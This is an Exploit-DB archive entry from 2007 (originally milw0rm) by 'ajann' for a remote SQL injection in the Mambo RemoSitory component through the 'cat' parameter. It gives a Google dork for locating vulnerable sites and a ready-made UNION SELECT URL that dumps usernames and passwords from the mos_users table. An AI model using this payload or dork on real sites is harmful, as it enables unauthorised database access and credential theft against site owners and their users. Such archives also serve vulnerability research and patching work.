Mambo Component Remository - 'cat' SQL Injection

EDB-ID:

4306


Author:

ajann

Type:

webapps


Platform:

PHP

Date:

2007-08-23


*******************************************************************************
# Title   :  Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.remository.com/
# $$      :  Free
# Dork    :  inurl:func=selectcat + com_remository   // Result:43.400
# DorkEx  :  http://www.google.com.tr/search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=tr&start=0&sa=N

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]///index.php?option=com_remository&func=selectcat&cat=[SQL]

Example:

//index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-08-23]